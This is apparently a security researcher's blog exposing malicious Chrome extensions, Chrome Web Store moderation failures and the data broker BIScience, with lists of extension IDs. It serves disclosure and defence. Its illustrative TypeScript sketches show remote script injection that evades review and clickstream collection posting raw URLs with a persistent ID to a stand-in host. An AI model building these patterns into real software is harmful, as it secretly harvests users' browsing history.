| StorySpace Manager for FB and IG Stories | 10,000 | cicohiknlppcipjbfpoghjbncojncjgb | ✓ |
| VPN Unblocker for YouTube | 40,000 | cnodohbngpblpllnokiijcpnepdmfkgm | |
| Universal Video Downloader | 200,000 | cogmkaeijeflocngklepoknelfjpdjng | ✓ |
| Free privacy connection - VPN guru | 500,000 | dcaffjpclkkjfacgfofgpjbmgjnjlpmh | ✓ |
| Live Recorder for Instagram aka MasterReco | 10,000 | djngbdfelbifdjcoclafcdhpamhmeamj | |
| Video Downloader for Vimeo | 100,000 | dkiipfbcepndfilijijlacffnlbchigb | ✓ |
| VPN Ultimate - Best VPN by unblock | 400,000 | epeigjgefhajkiiallmfblgglmdbhfab | ✓ |
| Insured Smart VPN - Best Proxy ever unblock everything | 2,000 | idoimknkimlgjadphdkmgocgpbkjfoch | |
| Ultra Downloader for Instagram | 30,000 | inekcncapjijgfjjlkadkmdgfoekcilb | ✓ |
| Parental Control. Blocks porn, malware, etc. | 3,000 | iohpehejkbkfdgpfhmlbogapmpkefdej | ✓ |
| UlV. Ultimate downloader for Vimeo | 2,000 | jpoobmnmkchgfckdlbgboeaojhgopidn | |
| Simplify. Downloader for Instagram | 20,000 | kceofhgmmjgfmnepogjifiomgojpmhep | ✓ |
| Download Facebook Video | 591 | kdemfcffpjfikmpmfllaehabkgkeakak | |
| VPN Unblocker for Facebook | 3,000 | kheajjdamndeonfpjchdmkpjlemlbkma | |
| Video Downloader for FaceBook | 90,000 | kjnmedaeobfmoehceokbmpamheibpdjj | ✓ |
| TikTok Video Keeper | 40,000 | kmobjdioiclamniofdnngmafbhgcniok | ✓ |
| Mass Downloader for Instagram | 100,000 | ldoldiahbhnbfdihknppjbhgjngibdbe | ✓ |
| Stories for FaceBook - Anon view, download | 3,000 | nfimgoaflmkihgkfoplaekifpeicacdn | ✓ |
| VPN Surf - Fast VPN by unblock | 800,000 | nhnfcgpcbfclhfafjlooihdfghaeinfc | ✓ |
| TikTok Video Downloader | 20,000 | oaceepljpkcbcgccnmlepeofkhplkbih | |
| Video Downloader for FaceBook | 10,000 | ododgdnipimbpbfioijikckkgkbkginh | |
| Exta: Pro downloader for Instagram | 10,000 | ppcmpaldbkcoeiepfbkdahoaepnoacgd | ✓ |
Update (2025-01-20): Added Adblock Bear and AdBlock 360 after a hint from a commenter.
As is often the case with Chrome Web Store, my searches regularly turned up more malicious extensions unrelated to the ones I was looking for. Some of them also devised their own mechanisms to execute remote code. I didn’t find more extensions using the same approach, which of course doesn’t mean that there are none.
Adblock for Youtube is yet another browser extension essentially bundling an interpreter for their very own minimalistic programming language. One part of the instructions it receives from its server is executed in the context of the privileged background worker, the other in the content script context.
EasyNav, Adblock Bear and AdBlock 360 use an approach quite similar to Phoenix Invicta. In particular, they add rules to the declarativeNetRequest API that they receive from their respective servers. EasyNav also removes security headers. These extensions don’t bother with HTML injection, however; instead, their server produces a list of scripts to be injected into web pages. There are specific scripts for some domains and a fallback for everything else.
Download Manager Integration Checklist is merely supposed to display some instructions; it shouldn’t need any privileges at all. Yet this extension requests access to all web pages and adds rules to the declarativeNetRequest API that it downloads from its server.
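For illustration, a minimal sketch of this remote-configuration pattern might look as follows. The endpoint and the response format are invented; only the chrome.declarativeNetRequest calls reflect the real API surface these extensions use:

```typescript
// Hypothetical sketch: request-modification rules and injectable scripts are
// fetched from a server instead of shipping with the extension. The endpoint
// and response format are invented for illustration.

interface RemoteConfig {
  dnrRules: chrome.declarativeNetRequest.Rule[]; // e.g. rules stripping security headers
  scripts: Record<string, string>;               // per-domain script URL, "*" as the fallback
}

// Background worker: replace the extension's dynamic declarativeNetRequest
// rules with whatever the server sent.
async function applyRemoteConfig(): Promise<RemoteConfig> {
  const config: RemoteConfig = await (await fetch("https://cfg.example.com/rules")).json();
  const existing = await chrome.declarativeNetRequest.getDynamicRules();
  await chrome.declarativeNetRequest.updateDynamicRules({
    removeRuleIds: existing.map((rule) => rule.id),
    addRules: config.dnrRules,
  });
  return config;
}

// Content script side (the config would be relayed from the background worker
// via messaging): pick the script for this domain, or fall back to the default.
function injectScript(config: RemoteConfig): void {
  const src = config.scripts[location.hostname] ?? config.scripts["*"];
  if (!src) return;
  const el = document.createElement("script");
  el.src = src; // remote code, invisible to a review of the extension package
  document.documentElement.appendChild(el);
}
```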
Translator makes it look like its configuration is all about downloading a list of languages. But the configuration also contains a regular expression to test against website addresses, along with instructions on what to do with matching websites: the tag name of an element to create and a bunch of attributes to set. Given that the element isn’t removed after insertion, this is probably about injecting advertising frames. However, the same mechanism could just as well be used to inject a script.
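A configuration-driven injection of this kind can be as simple as the following sketch. The field names and the endpoint are invented, and this is not Translator’s actual code, but it shows how little it takes:

```typescript
// Hypothetical sketch of configuration-driven element injection. Field names
// and the endpoint are invented for illustration.

interface InjectionRule {
  pattern: string;                    // regular expression matched against the page URL
  tagName: string;                    // e.g. "iframe" for an ad frame, or just as easily "script"
  attributes: Record<string, string>; // e.g. { src: "https://ads.example.com/frame" }
}

async function runInjections(): Promise<void> {
  const rules: InjectionRule[] =
    await (await fetch("https://translate-cfg.example.com/languages")).json();

  for (const rule of rules) {
    if (!new RegExp(rule.pattern).test(location.href)) continue;
    const el = document.createElement(rule.tagName);
    for (const [name, value] of Object.entries(rule.attributes)) {
      el.setAttribute(name, value);
    }
    // The element stays in the page, consistent with injecting an advertising
    // frame; nothing stops the same mechanism from creating a script element.
    document.body.appendChild(el);
  }
}
```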
| Name | Weekly active users | Extension ID | Featured |
|---|---|---|---|
| Adblock for Youtube™ - Auto Skip ad | 8,000 | anceggghekdpfkjihcojnlijcocgmaoo | ✓ |
| EasyNav | 30,000 | aobeidoiagedbcogakfipippifjheaom | |
| Adblock Bear - stop invasive ads | 100,000 | gdiknemhndplpgnnnjjjhphhembfojec | |
| AdBlock 360 | 400,000 | ghfkgecdjkmgjkhbdpjdhimeleinmmkl | |
| Download Manager Integration Checklist | 70,000 | ghkcpcihdonjljjddkmjccibagkjohpi | ✓ |
| Translator | 100,000 | icchadngbpkcegnabnabhkjkfkfflmpj | |
The following domain names are associated with Phoenix Invicta:
The following domain names are used by Netflix Party and related extensions:
The following domain names are used by Sweet VPN and related extensions:
These domain names are used by the extensions in the bonus section:
Let’s make one thing clear first: I’m not singling out Google’s handling of problematic and malicious browser extensions because it is worse than Microsoft’s, for example. No, Microsoft is probably even worse, but I never bothered finding out, because Microsoft Edge doesn’t matter: its market share is too small. Google Chrome, on the other hand, is used by around 90% of users worldwide, and one would expect Google to take its responsibility to protect those users very seriously, right? After all, browser extensions are one selling point of Google Chrome, so certainly Google would make sure they are safe?
Unfortunately, my experience reporting numerous malicious or otherwise problematic browser extensions speaks otherwise. Google appears to take the “least effort required” approach towards moderating Chrome Web Store. Their attempts to automate all things moderation do little to deter malicious actors, all while creating considerable issues for authors of legitimate add-ons. Even when reports reach Google’s human moderation team, the actions taken are inconsistent, and Google generally shies away from taking decisive actions against established businesses.
As a result, for a decade my recommendation for Chrome users has been to stay away from Chrome Web Store if possible. Whenever extensions are absolutely necessary, it should be known who is developing them, why, and how the development is being funded. Just installing some extension from Chrome Web Store, including those recommended by Google or “featured,” is very likely to result in your browsing data being sold or worse.
Google employees will certainly disagree with me. Sadly, much of that is organizational blindness. I am certain that you meant well and that you did many innovative things to make it work. But looking at it from the outside, it’s the result that matters. And for end users the result is a huge (and rather dangerous) mess.
Five years ago I discovered that Avast browser extensions were spying on their users. Mozilla and Opera disabled the extension listings immediately after my report. Google, on the other hand, took two weeks, during which they supposedly discussed their policies internally. The result of that discussion was eventually their “no surprises” policy:
Building and maintaining user trust in the Chrome Web Store is paramount, which means we set a high bar for developer transparency. All functionalities of extensions should be clearly disclosed to the user, with no surprises. This means we will remove extensions which appear to deceive or mislead users, enable dishonest behavior, or utilize clickbaity functionality to artificially grow their distribution.
So when dishonest behavior from extensions is reported today, Google should act immediately and decisively, right? Let’s take a look at two examples that came up in the past few months.
In October I wrote about the refoorest extension deceiving its users. I could conclusively prove that Colibri Hero, the company behind refoorest, deceives its users about the number of trees they supposedly plant, luring people into installing with empty promises. In fact, there is strong indication that the company never even donated for planting trees beyond a rather modest one-time donation.
Google got my report and dealt with it. What kind of action did they take? That’s a very good question that Google won’t answer. But refoorest is still available from Chrome Web Store, it is still “featured,” and it still advertises the very same completely made-up numbers of trees they supposedly planted. Google even advertises the extension, listing it in the “Editors’ Picks extensions” collection, which is probably why it has gained users since my report. So much for being honest. For comparison: refoorest used to be available from Firefox Add-ons as well but had already been removed when I started my investigation. Opera removed the extension from their add-on store within hours of my report.
But maybe that issue wasn’t serious enough? After all, there is no harm done to users if the company is simply pocketing the money it claims to spend on a good cause. So, also in October, I wrote about the Karma extension spying on its users. Users are not being notified about their browsing data being collected and sold, except for a note buried in the privacy policy. Surely that’s identical to the Avast case mentioned before, and the extension needs to be taken down to protect users?
Again, Google got my report and dealt with it. And again I fail to see any result of their action. The Karma extension remains available on Chrome Web Store unchanged; it still notifies their server about every web page you visit. The users still aren’t informed about this. Yet its Chrome Web Store page continues to claim “This developer declares that your data is not being sold to third parties, outside of the approved use cases,” a statement contradicted by their privacy policy. The extension appears to have lost its “Featured” badge at some point, but now it is back.
Note: Of course Karma isn’t the only data broker that Google tolerates in Chrome Web Store. I published a guest article today by a researcher who didn’t want to disclose their identity, explaining their experience with BIScience Ltd., a company misleading millions of extension users to collect and sell their browsing data. This post also explains how Google’s “approved use cases” effectively allow pretty much any abuse of users’ data.
Mind you, neither refoorest nor Karma acted alone; both recruited or bought other browser extensions as well. These other browser extensions were turned outright malicious, with stealth functionality to perform affiliate fraud and/or collect users’ browsing history. Google’s reaction was very inconsistent here. While most extensions affiliated with Karma were removed from Chrome Web Store, the extension with the highest user numbers (and performing affiliate fraud without telling its users) was allowed to remain for some reason.
With refoorest, most affiliated extensions were removed or stopped using the Impact Hero SDK. Yet when I checked more than two months after my report, two extensions from my original list still appeared to include the hidden affiliate fraud functionality, and I found seven new ones that Google apparently hadn’t noticed.
Now you may be wondering: if I reported these issues, why do I have to guess what Google did in response to my reports? Actually, keeping me in the dark is Google’s official policy:
This is, by the way, the response I received in November after pointing out the inconsistent treatment of the extensions. A month later the state of affairs was still that some malicious extensions had been removed while other extensions with identical functionality remained available for users to install, and I have no idea why that is. I’ve heard before that Google employees aren’t allowed to discuss enforcement actions, and your guess is as good as mine as to whom this policy is supposed to protect.
Supposedly, the idea behind not commenting on policy enforcement actions is to hide the internal decision making from bad actors, so that they don’t know how to game the process. If that’s the theory, however, it isn’t working. In this particular case the bad actors got some feedback, be it through their extensions being removed or through the adjustments demanded by Google. It’s only me, the reporter of these issues, who is left guessing.
But, and this is a positive development, I’ve received confirmation that both these reports are being worked on. This is more than I usually get from Google, which is: silence. And typically no visible reaction either, at least until a report starts circulating in media publications, forcing Google to act on it.
But let’s take a step back and ask ourselves: how does one report Chrome Web Store policy violations? Given how much Google emphasizes its policies, there should be an obvious way, right?
In fact, there is a support document on reporting issues. And when I started asking around, even Google employees would direct me to it.
If you find something in the Chrome Web Store that violates the Chrome Web Store Terms of Service, or trademark or copyright infringement, let us know.
Sounds good, right? Except that the first option says:
At the bottom left of the window, click Flag Issue.
Ok, that’s clearly the old Chrome Web Store. But we understand of course that they mean the “Flag concern” link which is nowhere near the bottom. And it gives us the following selection:
This doesn’t really seem like the place to report policy violations. Even “Felt suspicious” isn’t right for an issue you can prove. And, unsurprisingly, after choosing this option Google just responds with:
Your abuse report has been submitted successfully.
No way to provide any details. No asking for my contact details in case they have questions. No context whatsoever, merely “felt suspicious.” This is probably fed to some algorithm somewhere which might result in… what actually? Judging by malicious extensions where users have been vocally complaining, often for years: nothing whatsoever. This isn’t the way.
Well, there is another option listed in the document:
If you think an item in the Chrome Web Store violates a copyright or trademark, fill out this form.
Yes, Google seems to care about copyright and trademark violations, but a policy violation isn’t one. If we try the form nevertheless, it gives us a promising selection:
Finally! Yes, policy reasons are exactly what we are after, let’s click that. And there comes another choice:
That’s really the only option offered. And I have questions. At the very least: in what jurisdiction is child sexual abuse material a non-legal reason to report content? And since when is that the only policy Chrome Web Store has?
We can go back and try “Legal Reasons to Report Content” of course, but the options available there are genuinely legal issues: intellectual property, court orders, or violations of hate speech laws. This is another dead end.
It took me a lot of asking around to learn that the real (and well-hidden) way to report Chrome Web Store policy violations is Chrome Web Store One Stop Support. I mean, I get that Google must be receiving lots of nonsense reports, and they probably want to limit that flood somehow. But making legitimate reports almost impossible can’t really be the way.
In 2019 Google launched the Developer Data Protection Reward Program (DDPRP), meant to address privacy violations in Chrome extensions. Its participation conditions were rather narrow for my taste; pretty much no issue would qualify for the program. But at least it was a reliable way to report issues, which might even get forwarded internally. Unfortunately, Google discontinued the program in August 2024.
It’s not that I am very convinced of DDPRP’s performance. I’ve used the program twice. The first time, I reported Keepa’s data exfiltration. DDPRP paid me an award for the report but, from what I could tell, allowed the extension to continue unchanged. The second report was about the malicious PDF Toolbox extension. That report was deemed out of scope for the program but was forwarded internally. The extension was then removed quickly, though that might have been due to the media coverage. The real benefit of the program was that it provided a documented way of reaching a human being at Google who would look at a problematic extension.
In theory, there should be no spam on Chrome Web Store. The policy is quite clear on that:
We don’t allow any developer, related developer accounts, or their affiliates to submit multiple extensions that provide duplicate experiences or functionality on the Chrome Web Store.
Unfortunately, this policy’s enforcement is lax at best. Back in June 2023 I wrote about a malicious cluster of Chrome extensions. I listed 108 extensions belonging to this cluster, pointing out their spamming in particular:
Well, 13 almost identical video downloaders, 9 almost identical volume boosters, 9 almost identical translation extensions, 5 almost identical screen recorders are definitely not providing value.
I’ve also documented the outright malicious extensions in this cluster, pointing out that other extensions were likely to turn malicious as well once they had sufficient users. And how did Google respond? The malicious extensions have been removed, yes. But other than that, 96 extensions from my original list remained active in January 2025, and there were of course more extensions that my original report didn’t list. For whatever reason, Google chose not to enforce their anti-spam policy against them.
And that’s merely one example. My most recent blog post documented 920 extensions using tricks to spam Chrome Web Store, most of them belonging to a few large extension clusters. As it turned out, Google had been made aware of this particular trick a year before my blog post. And again, for some reason, Google chose not to act.
So when you search for extensions in Chrome Web Store, many results will likely come from one of the spam clusters. But the choice to install a particular extension is typically based on reviews. Can at least these reviews be trusted? Concerning moderation of reviews Google says:
Google doesn’t verify the authenticity of reviews and ratings, but reviews that violate our terms of service will be removed.
And the important part in the terms of service is:
Your reviews should reflect the experience you’ve had with the content or service you’re reviewing. Do not post fake or inaccurate reviews, the same review multiple times, reviews for the same content from multiple accounts, reviews to mislead other users or manipulate the rating, or reviews on behalf of others. Do not misrepresent your identity or your affiliation to the content you’re reviewing.
Now you may be wondering how well these rules are being enforced. The obviously fake review on the Karma extension is still there, three months after being posted. Not that it matters, given their continuous stream of incoming five-star reviews.
A month ago I reported an extension to Google that, despite having merely 10,000 users, received 19 five-star reviews on a single day in September – and only a single (negative) review since then. I pointed out that this is a consistent pattern across all extensions of this account; for example, another extension (merely 30 users) received 9 five-star reviews on the same day. It really doesn’t get any more obvious than that. Yet all these reviews are still online.
And it isn’t only fake reviews. The refoorest extension incentivizes reviews, which violates Google’s anti-spam policy (emphasis mine):
Developers must not attempt to manipulate the placement of any extensions in the Chrome Web Store. This includes, but is not limited to, inflating product ratings, reviews, or install counts by illegitimate means, such as fraudulent or incentivized downloads, reviews and ratings.
It has been three months, and they are still allowed to continue. The extension gets a massive amount of overwhelmingly positive reviews, users get their fake trees, everybody is happy. Well, other than the people trying to make sense of these meaningless reviews.
With reviews being so easy to game, it looks like lots of extensions are doing it. Sometimes it shows as a clearly inflated review count, sometimes as overwhelmingly positive or meaningless review content. At this point, any user rating with an average above 4 stars has likely been messed with.
But at least the “Featured” badge is meaningful, right? It certainly sounds like somebody at Google reviewed the extension and considered it worthy of carrying the badge. Google’s announcement indeed suggests a manual review:
Chrome team members manually evaluate each extension before it receives the badge, paying special attention to the following:
- Adherence to Chrome Web Store’s best practices guidelines, including providing an enjoyable and intuitive experience, using the latest platform APIs and respecting the privacy of end-users.
- A store listing page that is clear and helpful for users, with quality images and a detailed description.
Yet looking through the 920 spammy extensions I reported recently, most of them carry the “Featured” badge. Yes, even the endless copies of video downloaders, volume boosters, AI assistants, translators and such. If there is an actual manual review of these extensions, as Google claims, it cannot be very thorough.
To provide a more tangible example: the Blaze VPN, Safum VPN and Snap VPN extensions in Chrome Web Store currently carry the “Featured” badge. These extensions (along with Ishaan VPN, which has barely any users) belong to the PDF Toolbox cluster which produced malicious extensions in the past. A cursory code inspection reveals that all four are identical and in fact clones of Nucleus VPN, which was removed from Chrome Web Store in 2021. They also simply don’t work: no connections succeed. The extension not working is something users of Nucleus VPN already complained about, a fact the extension compensated for with fake reviews.
So it looks like the main criteria for awarding the “Featured” badge are the things which can be verified automatically: user count, Manifest V3, a claim to respect privacy (not even the privacy policy, merely that the right checkbox was checked), and a Chrome Web Store listing with all the necessary promotional images. Given how many such extensions are plainly broken, the requirements on user interface and general extension quality don’t seem to be too high. And providing unique functionality definitely isn’t on the list of criteria.
In other words: if you are a Chrome user, the “Featured” badge is completely meaningless. It is no guarantee that the extension isn’t malicious, not even an indication. In fact, authors of malicious extensions will invest some extra effort to get this badge, because Chrome Web Store’s search ranking appears to weigh it considerably in the extension’s favor.
Google Chrome first introduced browser extensions in 2011. At that point the dominant browser extension ecosystem was Mozilla’s, which had been around for 12 years already. Mozilla’s extensions suffered from a number of issues that Chrome’s developers of course noticed: essentially unrestricted privileges gave extensions a high damage potential (both intentional and unintentional), necessitating very thorough reviews before they could be published on the Mozilla Add-ons website. And since these reviews relied largely on volunteers, they often took a long time, with the publication delays being very frustrating to add-on developers.
Disclaimer: I was a reviewer on Mozilla Add-ons myself between 2015 and 2017.
Google Chrome was meant to address all these issues. It pioneered sandboxed extensions which allowed limiting extension privileges. And Chrome Web Store focused on automated reviews from the very start, relying on heuristics to detect problematic behavior in extensions, so that manual reviews would only be necessary occasionally and after the extension was already published. Eventually, market pressure forced Mozilla to adopt largely the same approaches.
Google’s over-reliance on automated tools caused issues from the very start, and it certainly didn’t get any better with the increased popularity of the browser. Mozilla accumulated a set of rules to make manual reviews possible: for example, all code should be contained in the extension, so no downloading of extension code from web servers. Also, reviewers had to be provided with an unobfuscated and unminified version of the source code. Google didn’t consider any of this necessary for their automated review systems. So when automated review failed, manual review was often very hard or even impossible.
It’s only now, with the introduction of Manifest V3, that Chrome finally prohibits remotely hosted code. And it took until 2018 to prohibit code obfuscation, while Google’s reviewers still have to reverse minification for manual reviews. Mind you, we are talking about policies that were already long established at Mozilla when Google entered the market in 2011.
And extension sandboxing, while without doubt useful, didn’t really solve the issue of malicious extensions. I already wrote about one issue back in 2016:
The problem is: useful extensions will usually request this kind of “give me the keys to the kingdom” permission.
Essentially, this renders permission prompts useless. Users cannot possibly tell whether an extension has valid reasons to request extensive privileges. So legitimate extensions have to constantly deal with users who are confused about why the extension needs to “read and change all your data on all websites.” At the same time, users are trained to accept such prompts without thinking twice.
And then malicious add-ons come along, requesting extensive privileges under a pretense. Monetization companies put out guides for extension developers on how to request more privileges for their extensions while fending off complaints from users and Google alike. There is a lot of this going on in Chrome Web Store, and Manifest V3 couldn’t change anything about it.
So what we have now is:
Numbers 3 and 4 in particular seem to trap Google further in the “it needs to be automated” mindset. Yet adding more automated layers isn’t going to solve the issue when there are companies that can put a hundred employees on devising new tricks to avoid triggering detection. Yes, malicious extensions are big business.
If Google were interested in making Chrome Web Store a safer place, I don’t think there is a way around investing considerable (manual) effort into cleaning up the place. Taking down a single extension won’t really hurt the malicious actors, they have hundreds of other extensions in the pipeline. Tracing the relationships between extensions on the other hand and taking down the entire cluster – that would change things.
As the saying goes, the best time to do this was a decade ago. The second best time is right now, when Chrome Web Store with its somewhat less than 150,000 extensions is certainly large but not yet large enough to make manual investigations impossible. Besides, there is probably little point in investigating abandoned extensions (latest release more than two years ago) which make up almost 60% of Chrome Web Store.
But so far Google’s actions have been entirely reactive, typically limited to extensions which already caused considerable damage. I don’t know whether they actually want to stay on top of this. From the business point of view there is probably little reason for that. After all, Google Chrome no longer has to compete for market share, having essentially won against the competition. Even with Chrome extensions not being usable, Chrome will likely stay the dominant browser.
In fact, Google has significant incentives to keep one particular class of extensions down, so one might even suspect intent behind allowing Chrome Web Store to be flooded with shady and outright malicious ad blockers.
Recently, John Tuckner of Secure Annex and Wladimir Palant published great research about how BIScience and its various brands collect user data. This inspired us to publish part of our ongoing research to help the extension ecosystem be safer from bad actors.
This post details what BIScience does with the collected data and how their public disclosures are inconsistent with actual practices, based on evidence compiled over several years.
BIScience is a long-established data broker that owns multiple extensions in the Chrome Web Store (CWS) that collect clickstream data under false pretenses. They also provide a software development kit (SDK) to partner third-party extension developers to collect and sell clickstream data from users, again under false pretenses. This SDK will send data to sclpfybn.com and other endpoints controlled by BIScience.
“Clickstream data” is an analytics industry term for “browsing history”. It consists of every URL users visit as they browse the web.
According to their website, BIScience “provides the deepest digital & behavioral data intelligence to market research companies, brands, publishers & investment firms”. They sell clickstream data through their Clickstream OS product and sell derived data under other product names.
BIScience owns AdClarity. They provide “advertising intelligence” for companies to monitor competitors. In other words, they have a large database of ads observed across the web. They use data collected from services operated by BIScience and third parties they partner with.
BIScience also owns Urban Cyber Security. They provide VPN, ad blocking, and safe browsing services under various names: Urban VPN, 1ClickVPN, Urban Browser Guard, Urban Safe Browsing, and Urban Ad Blocker. Urban collects user browsing history from these services, which is then sold by BIScience to third parties through Clickstream OS, AdClarity, and other products.
BIScience also owned GeoSurf, a residential proxy service that shut down in December 2023.
BIScience is a huge player in the browser extension ecosystem, based on their own claims and our observed activity. They also collect data from other sources, including Windows apps and Android apps that spy on other running apps.
The websites of BIScience and AdClarity make the following claims:
These numbers are the most recent figures from all pages on their websites, not only the home pages. They have consistently risen over the years based on archived website data, so it’s safe to say any lower figures on their website are outdated.
BIScience proactively contacts extension developers to buy clickstream data. They claim to buy this data in anonymized form, and in a manner compliant with Chrome Web Store policies. Both claims are demonstrably false.
Several third-party extensions integrate with BIScience’s SDK. Some are listed in the Secure Annex blog post, and we have identified more in the IOCs section. There are additional extensions which use their own custom endpoint on their own domain, making it more difficult to identify their sale of user data to BIScience and potentially other data brokers. Secure Annex identifies October 2023 as the earliest known date of BIScience integrations. Our evidence points to 2019 or earlier.
Our internal data shows the Visual Effects for Google Meet extension and other extensions collecting data since at least mid-2022. BIScience has likely been collecting data from extensions since 2019 or earlier, based on public GitHub posts by BIScience representatives (2021, 2021, 2022) and the 2019 DataSpii research that found some references to AdClarity in extensions. BIScience was founded in 2009 when they launched GeoSurf. They later launched AdClarity in 2012.
Despite BIScience’s claims that they only acquire anonymized data, their own extensions send raw URLs, and third-party extensions also send raw URLs to BIScience. Therefore BIScience collects granular clickstream data, not anonymized data.
If they meant to say that they only use/resell anonymized data, that’s not comforting either. BIScience receives the raw data and may store, use, or resell it as they choose. They may be compelled by governments to provide the raw data, or other bad actors may compromise their systems and access the raw data. In general, collecting more data than needed increases risks for user privacy.
Even if they anonymize data as soon as they receive it, anonymous clickstream data can contain sensitive or identifying information. A notable example is the Avast-Jumpshot case discovered by Wladimir Palant, who also wrote a deep dive into why anonymizing browsing history is very hard.
As the U.S. FTC investigation found, Jumpshot stored unique device IDs that did not change over time. This allowed reidentification with a sufficient number of URLs containing identifying information or when combined with other commercially-available data sources.
Similarly, BIScience’s collected browsing history is also tied to a unique device ID that does not change over time. A user’s browsing history may be tied to their unique ID for years, making it easier for BIScience or their buyers to perform reidentification.
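To make this concrete, the collection pattern described above, raw URLs tied to a persistent device identifier, takes only a handful of lines inside an extension. This is a hypothetical sketch with an invented endpoint and payload, not the actual BIScience SDK:

```typescript
// Hypothetical sketch of clickstream collection in an extension. The endpoint
// and payload fields are invented; only the chrome.* APIs are real.

async function getDeviceId(): Promise<string> {
  // A persistent random ID: exactly the kind of long-lived identifier that
  // lets years of browsing history be linked back together.
  const stored = await chrome.storage.local.get("deviceId");
  if (typeof stored.deviceId === "string") return stored.deviceId;
  const id = crypto.randomUUID();
  await chrome.storage.local.set({ deviceId: id });
  return id;
}

chrome.tabs.onUpdated.addListener(async (_tabId, changeInfo) => {
  if (!changeInfo.url) return; // fires whenever a tab navigates to a new URL
  await fetch("https://collector.example.com/clickstream", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({
      deviceId: await getDeviceId(), // stable across years of browsing
      url: changeInfo.url,           // the raw URL, not an anonymized version
      timestamp: Date.now(),
    }),
  });
});
```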
BIScience’s privacy policy states granular browsing history information is sometimes sold with unique identifiers (emphasis ours):
In most cases the Insights are shared and [sold] in an aggregated non-identifying manner, however, in certain cases we will sell or share the insights with a general unique identifier, this identifier does not include your name or contact information, it is a random serial number associated with an End Users’ browsing activity. However, in certain jurisdictions this is considered Personal Data, and thus, we treat it as such.
When you read the Chrome Web Store privacy disclosures on every extension listing, they say:
This developer declares that your data is
- Not being sold to third parties, outside of approved use cases
- Not being used or transferred for purposes that are unrelated to the item’s core functionality
- Not being used or transferred to determine creditworthiness or for lending purposes
You might wonder how these declarations square with extensions that sell your browsing history.
BIScience and partners take advantage of loopholes in the Chrome Web Store policies, mainly the exceptions listed in the Limited Use policy, which are the “approved use cases”. These exceptions appear to allow the transfer of user data to third parties for any of the following purposes:
- if necessary to providing or improving your single purpose;
- to comply with applicable laws;
- to protect against malware, spam, phishing, or other fraud or abuse; or,
- as part of a merger, acquisition or sale of assets of the developer after obtaining explicit prior consent from the user
The Limited Use policy later states:
All other transfers, uses, or sale of user data is completely prohibited, including:
- Transferring, using, or selling data for personalized advertisements.
- Transferring or selling user data to third parties like advertising platforms, data brokers, or other information resellers.
- Transferring, using, or selling user data to determine credit-worthiness or for lending purposes.
BIScience and partner extensions develop user-facing features that allegedly require access to browsing history, to claim the “necessary to providing or improving your single purpose” exception. They also often implement safe browsing or ad blocking features, to claim the “protect against malware, spam, phishing” exception.
Chrome Web Store appears to interpret their policies as allowing the transfer of user data, if extensions claim Limited Use exceptions through their privacy policy or other user disclosures. Unfortunately, bad actors falsely claim these exceptions to sell user data to third parties.
This is despite the CWS User Data FAQ stating (emphasis ours):
- Can my extension collect web browsing activity not necessary for a user-facing feature, such as collecting behavioral ad-targeting data or other monetization purposes?
No. The Limited Uses of User Data section states that an extension can only collect and transmit web browsing activity to the extent required for a user-facing feature that is prominently described in the Chrome Web Store page and user interface. Ad targeting or other monetization of this data isn’t for a user-facing feature. And, even if a user-facing feature required collection of this data, its use for ad targeting or any other monetization of the data wouldn’t be permitted because the Product is only permitted to use the data for the user-facing feature.
In other words, even if there is a “legitimate” feature that collects browsing history, the same data cannot be sold for profit.
Unfortunately, when we and other researchers ask Google to enforce these policies, they appear to lean towards giving bad actors the benefit of the doubt and allow the sale of user data obtained under false pretenses.
We have the receipts: contracts, emails, and more proving that BIScience and partners transfer and sell user data in a “completely prohibited” manner, primarily by “transferring or selling user data to third parties like advertising platforms, data brokers, or other information resellers” with intent to monetize the data.
Urban products (owned by BIScience) appear to provide ad blocking and safe browsing services, both of which may claim the “protect against malware, spam, phishing” exception. Their VPN products (Urban VPN, 1ClickVPN) may claim the “necessary to providing single purpose” exception.
These exceptions are abused by BIScience to collect browsing history data for prohibited purposes, because they also sell this user data to third parties through AdClarity and other BIScience products. There are ways to provide these services without processing raw URLs on servers, so they do not need to collect this data. They certainly don’t need to sell it to third parties.
Reputable ad blocking extensions, such as Adblock Plus, perform blocking solely on the client side, without sending every URL to a server. Safe browsing protection can also be performed client side or in a more privacy-preserving manner even when using server-side processing.
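To make the contrast concrete, here is a simplified sketch of both approaches. Neither snippet is Adblock Plus’s nor any real safe-browsing vendor’s implementation; the lookup endpoint is invented, and real systems add URL canonicalization, local caching and full-hash verification:

```typescript
// 1. Pure client-side blocking: the filter list is downloaded once and all
//    matching happens locally, so no visited URL ever leaves the browser.
const blockedHosts = new Set(["ads.example.com", "tracker.example.net"]);

function isBlocked(url: string): boolean {
  return blockedHosts.has(new URL(url).hostname);
}

// 2. Hash-prefix lookup: even with server-side processing, only a short hash
//    prefix of the hostname is sent, so the server cannot reconstruct the
//    user's browsing history from the queries alone.
async function hostHashPrefix(hostname: string): Promise<string> {
  const digest = await crypto.subtle.digest("SHA-256", new TextEncoder().encode(hostname));
  return Array.from(new Uint8Array(digest).slice(0, 4)) // 4-byte prefix only
    .map((b) => b.toString(16).padStart(2, "0"))
    .join("");
}

async function checkSafeBrowsing(url: string): Promise<boolean> {
  const prefix = await hostHashPrefix(new URL(url).hostname);
  const res = await fetch(`https://lookup.example.com/v1?prefix=${prefix}`); // hypothetical service
  const { candidates } = await res.json();
  // A real client would now compare full hashes locally against the returned
  // candidates; for brevity we just report whether the prefix matched anything.
  return Array.isArray(candidates) && candidates.length > 0;
}
```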
Partner third-party extensions collect data under even worse false pretenses. Partners are encouraged by BIScience to implement bogus services that exist solely to collect and sell browsing history to BIScience. These bogus features are only added to claim the Limited Use policy exceptions.
We analyzed several third-party extensions that partner with BIScience. None have legitimate business or technical reasons to collect browsing history and sell it to BIScience.
BIScience provides partner extensions with two integration options: They can add the BIScience SDK to automatically collect data, or partners can send their self-collected data to a BIScience API endpoint or S3 bucket.
The consistent message from the documents and emails provided by BIScience to our sources is essentially this, in our own words: You can integrate our SDK or send us browsing history activity if you make a plausible feature for your existing extension that has nothing to do with your actual functionality that you have provided for years. And here are some lies you can tell CWS to justify the collection.
The SDKs we have observed provide either safe browsing or ad blocking features, which makes it easy for partner extensions to claim the “protect against malware, spam, phishing” exception.
The SDK checks raw URLs against a BIScience service hosted on sclpfybn.com. With light integration work, an extension can claim to offer safe browsing protection or ad blocking. We have not evaluated how effective this protection is compared to reputable vendors, but we suspect it performs just enough functionality to pass casual examination. We confirmed that this endpoint also collects user data for resale, which is unrelated to the safe browsing protection.
